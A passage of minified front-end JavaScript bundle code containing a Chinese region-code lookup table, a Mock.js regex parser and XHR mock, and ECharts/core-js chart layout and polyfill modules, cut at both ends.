",640522:"海原县",640523:"其它区",65e4:"新疆维吾尔自治区",650100:"乌鲁木齐市",650102:"天山区",650103:"沙依巴克区",650104:"新市区",650105:"水磨沟区",650106:"头屯河区",650107:"达坂城区",650109:"米东区",650121:"乌鲁木齐县",650122:"其它区",650200:"克拉玛依市",650202:"独山子区",650203:"克拉玛依区",650204:"白碱滩区",650205:"乌尔禾区",650206:"其它区",652100:"吐鲁番地区",652101:"吐鲁番市",652122:"鄯善县",652123:"托克逊县",652124:"其它区",652200:"哈密地区",652201:"哈密市",652222:"巴里坤哈萨克自治县",652223:"伊吾县",652224:"其它区",652300:"昌吉回族自治州",652301:"昌吉市",652302:"阜康市",652323:"呼图壁县",652324:"玛纳斯县",652325:"奇台县",652327:"吉木萨尔县",652328:"木垒哈萨克自治县",652329:"其它区",652700:"博尔塔拉蒙古自治州",652701:"博乐市",652702:"阿拉山口市",652722:"精河县",652723:"温泉县",652724:"其它区",652800:"巴音郭楞蒙古自治州",652801:"库尔勒市",652822:"轮台县",652823:"尉犁县",652824:"若羌县",652825:"且末县",652826:"焉耆回族自治县",652827:"和静县",652828:"和硕县",652829:"博湖县",652830:"其它区",652900:"阿克苏地区",652901:"阿克苏市",652922:"温宿县",652923:"库车县",652924:"沙雅县",652925:"新和县",652926:"拜城县",652927:"乌什县",652928:"阿瓦提县",652929:"柯坪县",652930:"其它区",653e3:"克孜勒苏柯尔克孜自治州",653001:"阿图什市",653022:"阿克陶县",653023:"阿合奇县",653024:"乌恰县",653025:"其它区",653100:"喀什地区",653101:"喀什市",653121:"疏附县",653122:"疏勒县",653123:"英吉沙县",653124:"泽普县",653125:"莎车县",653126:"叶城县",653127:"麦盖提县",653128:"岳普湖县",653129:"伽师县",653130:"巴楚县",653131:"塔什库尔干塔吉克自治县",653132:"其它区",653200:"和田地区",653201:"和田市",653221:"和田县",653222:"墨玉县",653223:"皮山县",653224:"洛浦县",653225:"策勒县",653226:"于田县",653227:"民丰县",653228:"其它区",654e3:"伊犁哈萨克自治州",654002:"伊宁市",654003:"奎屯市",654021:"伊宁县",654022:"察布查尔锡伯自治县",654023:"霍城县",654024:"巩留县",654025:"新源县",654026:"昭苏县",654027:"特克斯县",654028:"尼勒克县",654029:"其它区",654200:"塔城地区",654201:"塔城市",654202:"乌苏市",654221:"额敏县",654223:"沙湾县",654224:"托里县",654225:"裕民县",654226:"和布克赛尔蒙古自治县",654227:"其它区",654300:"阿勒泰地区",654301:"阿勒泰市",654321:"布尔津县",654322:"富蕴县",654323:"福海县",654324:"哈巴河县",654325:"青河县",654326:"吉木乃县",654327:"其它区",659001:"石河子市",659002:"阿拉尔市",659003:"图木舒克市",659004:"五家渠市",71e4:"台湾",710100:"台北市",710101:"中正区",710102:"大同区",710103:"中山区",710104:"松山区",710105:"大安区",710106:"万华区",710107:"信义区",710108:"士林区",710109:"北投区",710110:"内湖区",710111:"南港区",710112:"文山区",710113:"其它区",710200:"高雄市",710201:"新兴区",710202:"前金区",710203:"芩雅区",710204:"盐埕区",710205:"鼓山区",710206:"旗津区",710207:"前镇区",710208:"三民区",710209:"左营区",710210:"楠梓区",710211:"小港区",710212:"其它区",710241:"苓雅区",710242:"仁武区",710243:"大社区",710244:"冈山区",710245:"路竹区",710246:"阿莲区",710247:"田寮区",710248:"燕巢区",710249:"桥头区",710250:"梓官区",710251:"弥陀区",710252:"永安区",710253:"湖内区",710254:"凤山区",710255:"大寮区",710256:"林园区",710257:"鸟松区",710258:"大树区",710259:"旗山区",710260:"美浓区",710261:"六龟区",710262:"内门区",710263:"杉林区",710264:"甲仙区",710265:"桃源区",710266:"那玛夏区",710267:"茂林区",710268:"茄萣区",710300:"台南市",710301:"中西区",710302:"东区",710303:"南区",710304:"北区",710305:"安平区",710306:"安南区",710307:"其它区",710339:"永康区",710340:"归仁区",710341:"新化区",710342:"左镇区",710343:"玉井区",710344:"楠西区",710345:"南化区",710346:"仁德区",710347:"关庙区",710348:"龙崎区",710349:"官田区",710350:"麻豆区",710351:"佳里区",710352:"西港区",710353:"七股区",710354:"将军区",710355:"学甲区",710356:"北门区",710357:"新营区",710358:"后壁区",710359:"白河区",710360:"东山区",710361:"六甲区",710362:"下营区",710363:"柳营区",710364:"盐水区",710365:"善化区",710366:"大内区",710367:"山上区",710368:"新市区",710369:"安定区",710400:"台中市",710401:"中区",710402:"东区",710403:"南区",710404:"西区",710405:"北区",710406:"北屯区",710407:"西屯区",710408:"南屯区",710409:"其它区",710431:"太平区",710432:"大里区",710433:"雾峰区",710434:"乌日区",710435:"丰原区",710436:"后里区",710437:"石冈区",710438:"东势区",710439:"和平区",710440:"新社区",710441:"潭子区",710442:"大雅区",710443:"神冈区",710444:"大肚区",710445:"沙鹿区",710446:"龙井区",710447:"梧栖区",710448:"清水区",710449:"大甲区",710450:"外埔区",710451:"大安区",710500:"金门县",710507:"金沙镇",710508:"金湖镇",710509:"金宁乡",710510:"金城镇",710511:"烈屿乡",710512:"乌坵乡",710600:"南投县",710614:"南投市",710615:"中寮乡",710616:"草屯镇",710617:"国姓乡",710618:"埔里镇",710619:"仁爱乡",710620:"名间乡",710621:"集集镇",710622:"水里乡",710623:"鱼池乡",710624:"信义乡",710625:"竹山镇",710626:"鹿谷乡",710700:"基隆市",710701:"仁爱区",710702:"信义区",710703:"中正区",710704:"中山区",710705:"安乐区",710706:"暖暖区",710707:"七堵区",710708:"其它区",710800:"新竹市",710801:"东区",710802:"北区",710803:"香山区",710804:"其它区",710900:"嘉义市",710901:"东区",710902:"西区",710903:"其它区",711100:"新北市",711130:"万里区",711131:"金山区",711132:"板桥区",711133:"汐止区",711134:"深坑区",711135:"石碇区",711136:"瑞芳区",711137:"平溪区",711138:"双溪区",711139:"贡寮区",711140:"新店区",711141:"坪林区",711142:"乌来区",711143:"永和区",711144:"中和区",711145:"土城区",711146:"三峡区",711147:"树林区",711148:"莺歌区",711149:"三重区",711150:"新庄区",711151:"泰山区",711152:"林口区",711153:"芦洲区",711154:"五股区",711155:"八里区",711156:"淡水区",711157:"三芝区",711158:"石门区",711200:"宜兰县",711214:"宜兰市",711215:"头城镇",711216:"礁溪乡",711217:"壮围乡",711218:"员山乡",711219:"罗东镇",711220:"三星乡",711221:"大同乡",711222:"五结乡",711223:"冬山乡",711224:"苏澳镇",711225:"南澳乡",711226:"钓鱼台",711300:"新竹县",711314:"竹北市",711315:"湖口乡",711316:"新丰乡",711317:"新埔镇",711318:"关西镇",711319:"芎林乡",711320:"宝山乡",711321:"竹东镇",711322:"五峰乡",711323:"横山乡",711324:"尖石乡",711325:"北埔乡",711326:"峨眉乡",711400:"桃园县",711414:"中坜市",711415:"平镇市",711416:"龙潭乡",711417:"杨梅市",711418:"新屋乡",711419:"观音乡",711420:"桃园市",711421:"龟山乡",711422:"八德市",711423:"大溪镇",711424:"复兴乡",711425:"大园乡",711426:"芦竹乡",711500:"苗栗县",711519:"竹南镇",711520:"头份镇",711521:"三湾乡",711522:"南庄乡",711523:"狮潭乡",711524:"后龙镇",711525:"通霄镇",711526:"苑里镇",711527:"苗栗市",711528:"造桥乡",711529:"头屋乡",711530:"公馆乡",711531:"大湖乡",711532:"泰安乡",711533:"铜锣乡",711534:"三义乡",711535:"西湖乡",711536:"卓兰镇",711700:"彰化县",711727:"彰化市",711728:"芬园乡",711729:"花坛乡",711730:"秀水乡",711731:"鹿港镇",711732:"福兴乡",711733:"线西乡",711734:"和美镇",711735:"伸港乡",711736:"员林镇",711737:"社头乡",711738:"永靖乡",711739:"埔心乡",711740:"溪湖镇",711741:"大村乡",711742:"埔盐乡",711743:"田中镇",711744:"北斗镇",711745:"田尾乡",711746:"埤头乡",711747:"溪州乡",711748:"竹塘乡",711749:"二林镇",711750:"大城乡",711751:"芳苑乡",711752:"二水乡",711900:"嘉义县",711919:"番路乡",711920:"梅山乡",711921:"竹崎乡",711922:"阿里山乡",711923:"中埔乡",711924:"大埔乡",711925:"水上乡",711926:"鹿草乡",711927:"太保市",711928:"朴子市",711929:"东石乡",711930:"六脚乡",711931:"新港乡",711932:"民雄乡",711933:"大林镇",711934:"溪口乡",711935:"义竹乡",711936:"布袋镇",712100:"云林县",712121:"斗南镇",712122:"大埤乡",712123:"虎尾镇",712124:"土库镇",712125:"褒忠乡",712126:"东势乡",712127:"台西乡",712128:"仑背乡",712129:"麦寮乡",712130:"斗六市",712131:"林内乡",712132:"古坑乡",712133:"莿桐乡",712134:"西螺镇",712135:"二仑乡",712136:"北港镇",712137:"水林乡",712138:"口湖乡",712139:"四湖乡",712140:"元长乡",712400:"屏东县",712434:"屏东市",712435:"三地门乡",712436:"雾台乡",712437:"玛家乡",712438:"九如乡",712439:"里港乡",712440:"高树乡",712441:"盐埔乡",712442:"长治乡",712443:"麟洛乡",712444:"竹田乡",712445:"内埔乡",712446:"万丹乡",712447:"潮州镇",712448:"泰武乡",712449:"来义乡",712450:"万峦乡",712451:"崁顶乡",712452:"新埤乡",712453:"南州乡",712454:"林边乡",712455:"东港镇",712456:"琉球乡",712457:"佳冬乡",712458:"新园乡",712459:"枋寮乡",712460:"枋山乡",712461:"春日乡",712462:"狮子乡",712463:"车城乡",712464:"牡丹乡",712465:"恒春镇",712466:"满州乡",712500:"台东县",712517:"台东市",712518:"绿岛乡",712519:"兰屿乡",712520:"延平乡",712521:"卑南乡",712522:"鹿野乡",712523:"关山镇",712524:"海端乡",712525:"池上乡",712526:"东河乡",712527:"成功镇",712528:"长滨乡",712529:"金峰乡",712530:"大武乡",712531:"达仁乡",712532:"太麻里乡",712600:"花莲县",712615:"花莲市",712616:"新城乡",712617:"太鲁阁",712618:"秀林乡",712619:"吉安乡",712620:"寿丰乡",712621:"凤林镇",712622:"光复乡",712623:"丰滨乡",712624:"瑞穗乡",712625:"万荣乡",712626:"玉里镇",712627:"卓溪乡",712628:"富里乡",712700:"澎湖县",712707:"马公市",712708:"西屿乡",712709:"望安乡",712710:"七美乡",712711:"白沙乡",712712:"湖西乡",712800:"连江县",712805:"南竿乡",712806:"北竿乡",712807:"莒光乡",712808:"东引乡",81e4:"香港特别行政区",810100:"香港岛",810101:"中西区",810102:"湾仔",810103:"东区",810104:"南区",810200:"九龙",810201:"九龙城区",810202:"油尖旺区",810203:"深水埗区",810204:"黄大仙区",810205:"观塘区",810300:"新界",810301:"北区",810302:"大埔区",810303:"沙田区",810304:"西贡区",810305:"元朗区",810306:"屯门区",810307:"荃湾区",810308:"葵青区",810309:"离岛区",82e4:"澳门特别行政区",820100:"澳门半岛",820200:"离岛",99e4:"海外",990100:"海外"};function i(e){for(var t,n={},i=0;ir;r++)o=e.charAt(r),"\n"===o?(t.seenCR||t.line++,t.column=1,t.seenCR=!1):"\r"===o||"\u2028"===o||"\u2029"===o?(t.line++,t.column=1,t.seenCR=!0):(t.column++,t.seenCR=!1)}return ei!==t&&(ei>t&&(ei=0,ti={line:1,column:1,seenCR:!1}),n(ti,ei,t),ei=t),ti}function b(e){ni>Jn||(Jn>ni&&(ni=Jn,ii=[]),ii.push(e))}function x(e){var t=0;for(e.sort();tJn?(i=e.charAt(Jn),Jn++):(i=null,0===ri&&b(Ln)),null!==i?(Qn=t,n=En(i),null===n?(Jn=t,t=n):t=n):(Jn=t,t=ke)):(Jn=t,t=ke),t}function fe(){var t,n,i;return t=Jn,92===e.charCodeAt(Jn)?(n=On,Jn++):(n=null,0===ri&&b(Pn)),null!==n?(Rn.test(e.charAt(Jn))?(i=e.charAt(Jn),Jn++):(i=null,0===ri&&b(Nn)),null!==i?(Qn=t,n=zn(i),null===n?(Jn=t,t=n):t=n):(Jn=t,t=ke)):(Jn=t,t=ke),t}function pe(){var t,n,i,r;if(t=Jn,e.substr(Jn,2)===Fn?(n=Fn,Jn+=2):(n=null,0===ri&&b(Vn)),null!==n){if(i=[],Bn.test(e.charAt(Jn))?(r=e.charAt(Jn),Jn++):(r=null,0===ri&&b(jn)),null!==r)for(;null!==r;)i.push(r),Bn.test(e.charAt(Jn))?(r=e.charAt(Jn),Jn++):(r=null,0===ri&&b(jn));else i=ke;null!==i?(Qn=t,n=Hn(i),null===n?(Jn=t,t=n):t=n):(Jn=t,t=ke)}else Jn=t,t=ke;return t}function ge(){var t,n,i,r;if(t=Jn,e.substr(Jn,2)===qn?(n=qn,Jn+=2):(n=null,0===ri&&b(Gn)),null!==n){if(i=[],Wn.test(e.charAt(Jn))?(r=e.charAt(Jn),Jn++):(r=null,0===ri&&b($n)),null!==r)for(;null!==r;)i.push(r),Wn.test(e.charAt(Jn))?(r=e.charAt(Jn),Jn++):(r=null,0===ri&&b($n));else i=ke;null!==i?(Qn=t,n=Un(i),null===n?(Jn=t,t=n):t=n):(Jn=t,t=ke)}else Jn=t,t=ke;return t}function me(){var t,n,i,r;if(t=Jn,e.substr(Jn,2)===Zn?(n=Zn,Jn+=2):(n=null,0===ri&&b(Yn)),null!==n){if(i=[],Wn.test(e.charAt(Jn))?(r=e.charAt(Jn),Jn++):(r=null,0===ri&&b($n)),null!==r)for(;null!==r;)i.push(r),Wn.test(e.charAt(Jn))?(r=e.charAt(Jn),Jn++):(r=null,0===ri&&b($n));else i=ke;null!==i?(Qn=t,n=Xn(i),null===n?(Jn=t,t=n):t=n):(Jn=t,t=ke)}else Jn=t,t=ke;return t}function ve(){var t,n;return t=Jn,e.substr(Jn,2)===Fn?(n=Fn,Jn+=2):(n=null,0===ri&&b(Vn)),null!==n&&(Qn=t,n=Kn()),null===n?(Jn=t,t=n):t=n,t}function ye(){var t,n,i;return t=Jn,92===e.charCodeAt(Jn)?(n=On,Jn++):(n=null,0===ri&&b(Pn)),null!==n?(e.length>Jn?(i=e.charAt(Jn),Jn++):(i=null,0===ri&&b(Ln)),null!==i?(Qn=t,n=Rt(i),null===n?(Jn=t,t=n):t=n):(Jn=t,t=ke)):(Jn=t,t=ke),t}var _e,be=arguments.length>1?arguments[1]:{},xe={regexp:w},we=w,ke=null,Se="",Me="|",Ae='"|"',Ce=function(e,t){return t?new i(e,t[1]):e},Te=function(e,t,n){return new r([e].concat(t).concat([n]))},Ie="^",De='"^"',Le=function(){return new n("start")},Ee="$",Oe='"$"',Pe=function(){return new n("end")},Re=function(e,t){return new s(e,t)},Ne="Quantifier",ze=function(e,t){return t&&(e.greedy=!1),e},Fe="{",Ve='"{"',Be=",",je='","',He="}",qe='"}"',Ge=function(e,t){return new l(e,t)},We=",}",$e='",}"',Ue=function(e){return new l(e,1/0)},Ze=function(e){return new l(e,e)},Ye="+",Xe='"+"',Ke=function(){return new l(1,1/0)},Je="*",Qe='"*"',et=function(){return new l(0,1/0)},tt="?",nt='"?"',it=function(){return new l(0,1)},rt=/^[0-9]/,ot="[0-9]",at=function(e){return+e.join("")},st="(",lt='"("',ut=")",ct='")"',ht=function(e){return e},dt=function(e){return new a(e)},ft="?:",pt='"?:"',gt=function(e){return new o("non-capture-group",e)},mt="?=",vt='"?="',yt=function(e){return new o("positive-lookahead",e)},_t="?!",bt='"?!"',xt=function(e){return new o("negative-lookahead",e)},wt="CharacterSet",kt="[",St='"["',Mt="]",At='"]"',Ct=function(e,t){return new u(!!e,t)},Tt="CharacterRange",It="-",Dt='"-"',Lt=function(e,t){return new c(e,t)},Et="Character",Ot=/^[^\\\]]/,Pt="[^\\\\\\]]",Rt=function(e){return new h(e)},Nt=".",zt='"."',Ft=function(){return new n("any-character")},Vt="Literal",Bt=/^[^|\\\/.[()?+*$\^]/,jt="[^|\\\\\\/.[()?+*$\\^]",Ht="\\b",qt='"\\\\b"',Gt=function(){return new n("backspace")},Wt=function(){return new n("word-boundary")},$t="\\B",Ut='"\\\\B"',Zt=function(){return new n("non-word-boundary")},Yt="\\d",Xt='"\\\\d"',Kt=function(){return new n("digit")},Jt="\\D",Qt='"\\\\D"',en=function(){return new n("non-digit")},tn="\\f",nn='"\\\\f"',rn=function(){return new n("form-feed")},on="\\n",an='"\\\\n"',sn=function(){return new n("line-feed")},ln="\\r",un='"\\\\r"',cn=function(){return new n("carriage-return")},hn="\\s",dn='"\\\\s"',fn=function(){return new n("white-space")},pn="\\S",gn='"\\\\S"',mn=function(){return new n("non-white-space")},vn="\\t",yn='"\\\\t"',_n=function(){return new n("tab")},bn="\\v",xn='"\\\\v"',wn=function(){return new n("vertical-tab")},kn="\\w",Sn='"\\\\w"',Mn=function(){return new n("word")},An="\\W",Cn='"\\\\W"',Tn=function(){return new n("non-word")},In="\\c",Dn='"\\\\c"',Ln="any character",En=function(e){return new m(e)},On="\\",Pn='"\\\\"',Rn=/^[1-9]/,Nn="[1-9]",zn=function(e){return new g(e)},Fn="\\0",Vn='"\\\\0"',Bn=/^[0-7]/,jn="[0-7]",Hn=function(e){return new p(e.join(""))},qn="\\x",Gn='"\\\\x"',Wn=/^[0-9a-fA-F]/,$n="[0-9a-fA-F]",Un=function(e){return new f(e.join(""))},Zn="\\u",Yn='"\\\\u"',Xn=function(e){return new d(e.join(""))},Kn=function(){return new n("null-character")},Jn=0,Qn=0,ei=0,ti={line:1,column:1,seenCR:!1},ni=0,ii=[],ri=0;if("startRule"in be){if(!(be.startRule in xe))throw new Error("Can't start parsing from rule \""+be.startRule+'".');we=xe[be.startRule]}if(n.offset=y,n.text=v,_e=we(),null!==_e&&Jn===e.length)return _e;throw x(ii),Qn=Math.max(Jn,ni),new t(ii,Qni)return!0;var a={path:t,type:e,actual:n,expected:i,action:"is greater than",message:o};return a.message=l.message(a),r.push(a),!1},lessThan:function(e,t,n,i,r,o){if(n=i)return!0;var a={path:t,type:e,actual:n,expected:i,action:"is greater than or equal to",message:o};return a.message=l.message(a),r.push(a),!1},lessThanOrEqualTo:function(e,t,n,i,r,o){if(n<=i)return!0;var a={path:t,type:e,actual:n,expected:i,action:"is less than or equal to",message:o};return a.message=l.message(a),r.push(a),!1}};a.Diff=s,a.Assert=l,e.exports=a},function(e,t,n){e.exports=n(28)},function(e,t,n){var i=n(3);window._XMLHttpRequest=window.XMLHttpRequest,window._ActiveXObject=window.ActiveXObject;try{new window.Event("custom")}catch(f){window.Event=function(e,t,n,i){var r=document.createEvent("CustomEvent");return r.initCustomEvent(e,t,n,i),r}}var r={UNSENT:0,OPENED:1,HEADERS_RECEIVED:2,LOADING:3,DONE:4},o="readystatechange loadstart progress abort error load timeout loadend".split(" "),a="timeout withCredentials".split(" "),s="readyState responseURL status statusText responseType response responseText responseXML".split(" "),l={100:"Continue",101:"Switching Protocols",200:"OK",201:"Created",202:"Accepted",203:"Non-Authoritative Information",204:"No Content",205:"Reset Content",206:"Partial Content",300:"Multiple Choice",301:"Moved Permanently",302:"Found",303:"See Other",304:"Not Modified",305:"Use Proxy",307:"Temporary Redirect",400:"Bad Request",401:"Unauthorized",402:"Payment Required",403:"Forbidden",404:"Not Found",405:"Method Not Allowed",406:"Not Acceptable",407:"Proxy Authentication Required",408:"Request Timeout",409:"Conflict",410:"Gone",411:"Length Required",412:"Precondition Failed",413:"Request Entity Too Large",414:"Request-URI Too Long",415:"Unsupported Media Type",416:"Requested Range Not Satisfiable",417:"Expectation Failed",422:"Unprocessable Entity",500:"Internal Server Error",501:"Not Implemented",502:"Bad Gateway",503:"Service Unavailable",504:"Gateway Timeout",505:"HTTP Version Not Supported"};function u(){this.custom={events:{},requestHeaders:{},responseHeaders:{}}}function c(){var e=function(){var e=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,t=/^([\w.+-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/,n=location.href,i=t.exec(n.toLowerCase())||[];return e.test(i[1])}();return window.ActiveXObject?!e&&t()||n():t();function t(){try{return new window._XMLHttpRequest}catch(e){}}function n(){try{return new window._ActiveXObject("Microsoft.XMLHTTP")}catch(e){}}}function h(e){for(var t in u.Mock._mocked){var n=u.Mock._mocked[t];if((!n.rurl||r(n.rurl,e.url))&&(!n.rtype||r(n.rtype,e.type.toLowerCase())))return n}function r(e,t){return"string"===i.type(e)?e===t:"regexp"===i.type(e)?e.test(t):void 0}}function d(e,t){return i.isFunction(e.template)?e.template(t):u.Mock.mock(e.template)}u._settings={timeout:"10-100"},u.setup=function(e){return i.extend(u._settings,e),u._settings},i.extend(u,r),i.extend(u.prototype,r),u.prototype.mock=!0,u.prototype.match=!1,i.extend(u.prototype,{open:function(e,t,n,r,l){var d=this;i.extend(this.custom,{method:e,url:t,async:"boolean"!==typeof n||n,username:r,password:l,options:{url:t,type:e}}),this.custom.timeout=function(e){if("number"===typeof e)return e;if("string"===typeof e&&!~e.indexOf("-"))return parseInt(e,10);if("string"===typeof e&&~e.indexOf("-")){var t=e.split("-"),n=parseInt(t[0],10),i=parseInt(t[1],10);return Math.round(Math.random()*(i-n))+n}}(u._settings.timeout);var f=h(this.custom.options);function p(e){for(var t=0;t=n.x&&e<=n.x+n.width&&t>=n.y&&t<=n.y+n.height},clone:function(){return new l(this.x,this.y,this.width,this.height)},copy:function(e){this.x=e.x,this.y=e.y,this.width=e.width,this.height=e.height},plain:function(){return{x:this.x,y:this.y,width:this.width,height:this.height}}},l.create=function(e){return new l(e.x,e.y,e.width,e.height)};var u=l;e.exports=u},9876:function(e,t,n){var i=n("03d6"),r=n("9742");e.exports=Object.keys||function(e){return i(e,r)}},"98b7":function(e,t){var n="undefined"!==typeof window&&(window.requestAnimationFrame&&window.requestAnimationFrame.bind(window)||window.msRequestAnimationFrame&&window.msRequestAnimationFrame.bind(window)||window.mozRequestAnimationFrame||window.webkitRequestAnimationFrame)||function(e){setTimeout(e,16)};e.exports=n},"98e7":function(e,t,n){var i=n("6d8b"),r=i.createHashMap;function o(e){return{getTargetSeries:function(t){var n={},i=r();return t.eachSeriesByType(e,(function(e){e.__paletteScope=n,i.set(e.uid,e)})),i},reset:function(e,t){var n=e.getRawData(),i={},r=e.getData();r.each((function(e){var t=r.getRawIndex(e);i[t]=e})),n.each((function(t){var o,a=i[t],s=null!=a&&r.getItemVisual(a,"color",!0),l=null!=a&&r.getItemVisual(a,"borderColor",!0);if(s&&l||(o=n.getItemModel(t)),!s){var u=o.get("itemStyle.color")||e.getColorFromPalette(n.getName(t)||t+"",e.__paletteScope,n.count());null!=a&&r.setItemVisual(a,"color",u)}if(!l){var c=o.get("itemStyle.borderColor");null!=a&&r.setItemVisual(a,"borderColor",c)}}))}}}e.exports=o},"998c":function(e,t,n){var i=n("6d8b"),r=n("2306"),o=n("e86a"),a=Math.PI;function s(e,t){t=t||{},i.defaults(t,{text:"loading",textColor:"#000",fontSize:"12px",maskColor:"rgba(255, 255, 255, 0.8)",showSpinner:!0,color:"#c23531",spinnerRadius:10,lineWidth:5,zlevel:0});var n=new r.Group,s=new r.Rect({style:{fill:t.maskColor},zlevel:t.zlevel,z:1e4});n.add(s);var l=t.fontSize+" sans-serif",u=new r.Rect({style:{fill:"none",text:t.text,font:l,textPosition:"right",textDistance:10,textFill:t.textColor},zlevel:t.zlevel,z:10001});if(n.add(u),t.showSpinner){var c=new r.Arc({shape:{startAngle:-a/2,endAngle:-a/2+.1,r:t.spinnerRadius},style:{stroke:t.color,lineCap:"round",lineWidth:t.lineWidth},zlevel:t.zlevel,z:10001});c.animateShape(!0).when(1e3,{endAngle:3*a/2}).start("circularInOut"),c.animateShape(!0).when(1e3,{startAngle:3*a/2}).delay(300).start("circularInOut"),n.add(c)}return n.resize=function(){var n=o.getWidth(t.text,l),i=t.showSpinner?t.spinnerRadius:0,r=(e.getWidth()-2*i-(t.showSpinner&&n?10:0)-n)/2-(t.showSpinner?0:n/2),a=e.getHeight()/2;t.showSpinner&&c.setShape({cx:r,cy:a}),u.setShape({x:r-i,y:a-i,width:2*i,height:2*i}),s.setShape({x:0,y:0,width:e.getWidth(),height:e.getHeight()})},n.resize(),n}e.exports=s},"99af":function(e,t,n){"use strict";var i=n("23e7"),r=n("d039"),o=n("e8b5"),a=n("861d"),s=n("7b0b"),l=n("50c4"),u=n("8418"),c=n("65f0"),h=n("1dde"),d=n("b622"),f=n("2d00"),p=d("isConcatSpreadable"),g=9007199254740991,m="Maximum allowed index exceeded",v=f>=51||!r((function(){var e=[];return e[p]=!1,e.concat()[0]!==e})),y=h("concat"),_=function(e){if(!a(e))return!1;var t=e[p];return void 0!==t?!!t:o(e)},b=!v||!y;i({target:"Array",proto:!0,forced:b},{concat:function(e){var t,n,i,r,o,a=s(this),h=c(a,0),d=0;for(t=-1,i=arguments.length;tg)throw TypeError(m);for(n=0;n=g)throw TypeError(m);u(h,d++,o)}return h.length=d,h}})},"9bdb":function(e,t,n){var i=n("282b"),r=i([["fill","color"],["shadowBlur"],["shadowOffsetX"],["shadowOffsetY"],["opacity"],["shadowColor"]]),o={getAreaStyle:function(e,t){return r(this,e,t)}};e.exports=o},"9bdd":function(e,t,n){var i=n("825a");e.exports=function(e,t,n,r){try{return r?t(i(n)[0],n[1]):t(n)}catch(a){var o=e["return"];throw void 0!==o&&i(o.call(e)),a}}},"9bf2":function(e,t,n){var i=n("83ab"),r=n("0cfb"),o=n("825a"),a=n("c04e"),s=Object.defineProperty;t.f=i?s:function(e,t,n){if(o(e),t=a(t,!0),o(n),r)try{return s(e,t,n)}catch(i){}if("get"in n||"set"in n)throw TypeError("Accessors not supported");return"value"in n&&(e[t]=n.value),e}},"9c0c":function(e,t,n){var i=n("1609");e.exports=function(e,t,n){if(i(e),void 0===t)return e;switch(n){case 1:return function(n){return e.call(t,n)};case 2:return function(n,i){return e.call(t,n,i)};case 3:return function(n,i,r){return e.call(t,n,i,r)}}return function(){return e.apply(t,arguments)}}},"9c0e":function(e,t){var n={}.hasOwnProperty;e.exports=function(e,t){return n.call(e,t)}},"9c2c":function(e,t,n){var i=n("401b"),r=i.min,o=i.max,a=i.scale,s=i.distance,l=i.add,u=i.clone,c=i.sub;function h(e,t,n,i){var h,d,f,p,g=[],m=[],v=[],y=[];if(i){f=[1/0,1/0],p=[-1/0,-1/0];for(var _=0,b=e.length;_=0;l--){var u=r["asc"===i?a-l-1:l].getValue();u/n*ts[1]&&(s[1]=t)}))}else s=[NaN,NaN];return{sum:i,dataExtent:s}}function S(e,t,n){for(var i,r=0,o=1/0,a=0,s=e.length;ar&&(r=i));var l=e.area*e.area,u=t*t*n;return l?c(u*r/l,l/(u*o)):1/0}function M(e,t,n,i,r){var o=t===n.width?0:1,a=1-o,s=["x","y"],l=["width","height"],u=n[s[o]],d=t?e.area/t:0;(r||d>n[l[a]])&&(d=n[l[a]]);for(var f=0,p=e.length;fs&&(c=s),a=o}c0&&(a=null===a?l:Math.min(a,l))}n[r]=a}}return n}function v(e){var t=m(e),n=[];return i.each(e,(function(e){var i,r=e.coordinateSystem,a=r.getBaseAxis(),s=a.getExtent();if("category"===a.type)i=a.getBandWidth();else if("value"===a.type||"time"===a.type){var l=a.dim+"_"+a.index,u=t[l],c=Math.abs(s[1]-s[0]),h=a.scale.getExtent(),p=Math.abs(h[1]-h[0]);i=u?c/p*u:c}else{var g=e.getData();i=Math.abs(s[1]-s[0])/g.count()}var m=o(e.get("barWidth"),i),v=o(e.get("barMaxWidth"),i),y=o(e.get("barMinWidth")||1,i),_=e.get("barGap"),b=e.get("barCategoryGap");n.push({bandWidth:i,barWidth:m,barMaxWidth:v,barMinWidth:y,barGap:_,barCategoryGap:b,axisKey:f(a),stackId:d(e)})})),y(n)}function y(e){var t={};i.each(e,(function(e,n){var i=e.axisKey,r=e.bandWidth,o=t[i]||{bandWidth:r,remainedWidth:r,autoWidthCount:0,categoryGap:"20%",gap:"30%",stacks:{}},a=o.stacks;t[i]=o;var s=e.stackId;a[s]||o.autoWidthCount++,a[s]=a[s]||{width:0,maxWidth:0};var l=e.barWidth;l&&!a[s].width&&(a[s].width=l,l=Math.min(o.remainedWidth,l),o.remainedWidth-=l);var u=e.barMaxWidth;u&&(a[s].maxWidth=u);var c=e.barMinWidth;c&&(a[s].minWidth=c);var h=e.barGap;null!=h&&(o.gap=h);var d=e.barCategoryGap;null!=d&&(o.categoryGap=d)}));var n={};return i.each(t,(function(e,t){n[t]={};var r=e.stacks,a=e.bandWidth,s=o(e.categoryGap,a),l=o(e.gap,1),u=e.remainedWidth,c=e.autoWidthCount,h=(u-s)/(c+(c-1)*l);h=Math.max(h,0),i.each(r,(function(e){var t=e.maxWidth,n=e.minWidth;if(e.width){i=e.width;t&&(i=Math.min(i,t)),n&&(i=Math.max(i,n)),e.width=i,u-=i+l*i,c--}else{var i=h;t&&ti&&(i=n),i!==h&&(e.width=i,u-=i+l*i,c--)}})),h=(u-s)/(c+(c-1)*l),h=Math.max(h,0);var d,f=0;i.each(r,(function(e,t){e.width||(e.width=h),d=e,f+=e.width*(1+l)})),d&&(f-=d.width*l);var p=-f/2;i.each(r,(function(e,i){n[t][i]=n[t][i]||{bandWidth:a,offset:p,width:e.width},p+=e.width*(1+l)}))})),n}function _(e,t,n){if(e&&t){var i=e[f(t)];return null!=i&&null!=n&&(i=i[d(n)]),i}}function b(e,t){var n=g(e,t),r=v(n),o={},a={};i.each(n,(function(e){var t=e.getData(),n=e.coordinateSystem,i=n.getBaseAxis(),l=d(e),u=r[f(i)][l],c=u.offset,h=u.width,p=n.getOtherAxis(i),g=e.get("barMinHeight")||0;o[l]=o[l]||[],a[l]=a[l]||[],t.setLayout({bandWidth:u.bandWidth,offset:c,size:h});for(var m=t.mapDimension(p.dim),v=t.mapDimension(i.dim),y=s(t,m),_=p.isHorizontal(),b=S(i,p,y),x=0,w=t.count();x=0?"p":"n",L=b;if(y&&(o[l][I]||(o[l][I]={p:b,n:b}),L=o[l][I][D]),_){var E=n.dataToPoint([T,I]);k=L,M=E[1]+c,A=E[0]-b,C=h,Math.abs(A)c||(d=c),{progress:f}}function f(e,t){var c,f=e.count,p=new h(2*f),g=new h(2*f),m=new 